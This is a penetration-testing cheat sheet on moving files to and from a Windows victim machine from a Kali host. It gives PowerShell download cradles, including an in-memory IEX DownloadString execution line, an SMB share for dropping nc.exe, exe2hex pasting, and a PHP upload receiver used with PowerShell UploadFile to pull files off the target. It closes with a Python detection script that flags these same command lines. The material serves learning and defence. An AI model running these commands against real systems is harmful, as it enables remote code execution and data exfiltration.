Transferring Files with Windows Hosts

  • PowerShell one-liner download

powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('http://<KALI IP>/<FILE>', '<FILE>')"

iwr -uri http://<KALI IP>/<FILE> -Outfile <FILE>

  • Run a PowerShell script in memory without saving it to disk

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://<KALI IP>/<SCRIPT>.ps1')

Uploading Files with SMB

  • Start an SMB server on Kali

impacket-smbserver <share name> <folder>
#ex. impacket-smbserver robogroot .

  • Mount the share on Windows

net use * \\<KALI IP>\<SHARE NAME>
#ex. net use * \\<KALI IP>\robogroot

  • Copy files to Windows

copy Z:\<file>
#ex. copy Z:\nc.exe

Windows Downloads with exe2hex and PowerShell

  • Inside Kali, run:

upx -9 nc.exe

exe2hex -x nc.exe -p nc.cmd

Paste the contents of nc.cmd into a shell on the Windows victim machine

Windows Uploads Using PowerShell

  • Step 1: Create upload.php inside /var/www/html

<?php
// Save the uploaded file under /var/www/uploads/, keeping only its base name
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . basename($_FILES['file']['name']);
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
?>

sudo mkdir /var/www/uploads

sudo chown www-data: /var/www/uploads

sudo systemctl restart apache2

  • Step 2: Post the file from Windows

powershell -c "(New-Object System.Net.WebClient).UploadFile('http://<KALI IP>/upload.php', '<FILE>')"
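
Seen from the defending side, the download, in-memory execution, SMB mount and upload commands above leave recognizable process command lines. The following is an added example, not part of the original page, that flags them in constructed sample events; the rule names, the classify/triage helpers and the sample hosts are assumptions made for illustration.

```python
import re

# Rules for the transfer commands on this page, applied to process command
# lines (Sysmon Event ID 1, or Security 4688 with command-line auditing).
RULES = [
    ("webclient_download", re.compile(r"Net\.WebClient\)?\s*\.\s*Download(File|String)\b", re.I)),
    ("webclient_upload", re.compile(r"Net\.WebClient\)?\s*\.\s*UploadFile\b", re.I)),
    ("iex_cradle", re.compile(r"\b(IEX|Invoke-Expression)\b.*\bDownloadString\b", re.I)),
    # Full parameter name only; abbreviated forms of -OutFile are not covered.
    ("web_request_to_file", re.compile(r"\b(iwr|Invoke-WebRequest)\b.*\s-OutFile\b", re.I)),
    # A share mounted by raw IPv4 address rather than by server name.
    ("smb_mount_by_ip", re.compile(r"\bnet(\.exe)?\s+use\b.*\\\\\d{1,3}(\.\d{1,3}){3}\\", re.I)),
]


def classify(command_line):
    """Return the sorted names of all rules that match one command line."""
    return sorted(name for name, rx in RULES if rx.search(command_line))


def triage(events):
    """Return (host, rule names, command line) for every flagged event."""
    hits = []
    for host, cmd in events:
        names = classify(cmd)
        if names:
            hits.append((host, names, cmd))
    return hits


# Constructed sample events (host, command line); 192.0.2.10 is a
# documentation address and the file names are made up.
SAMPLE_EVENTS = [
    ("ws01", r'''powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('http://192.0.2.10/tool.exe', 'tool.exe')"'''),
    ("ws01", r'''iwr -uri http://192.0.2.10/tool.exe -Outfile tool.exe'''),
    ("ws01", r'''powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.0.2.10/run.ps1')'''),
    ("ws01", r'''net use * \\192.0.2.10\robogroot'''),
    ("ws01", r'''powershell -c "(New-Object System.Net.WebClient).UploadFile('http://192.0.2.10/upload.php', 'report.txt')"'''),
    ("ws02", r'''powershell.exe -c "Get-ChildItem C:\Users"'''),
    ("ws02", r'''net use Z: \\fileserver\share'''),
]

if __name__ == "__main__":
    for host, names, cmd in triage(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(names)} :: {cmd}")
```

Plain string matching misses encoded or obfuscated command lines, so rules like these are best paired with PowerShell script block logging (Event ID 4104).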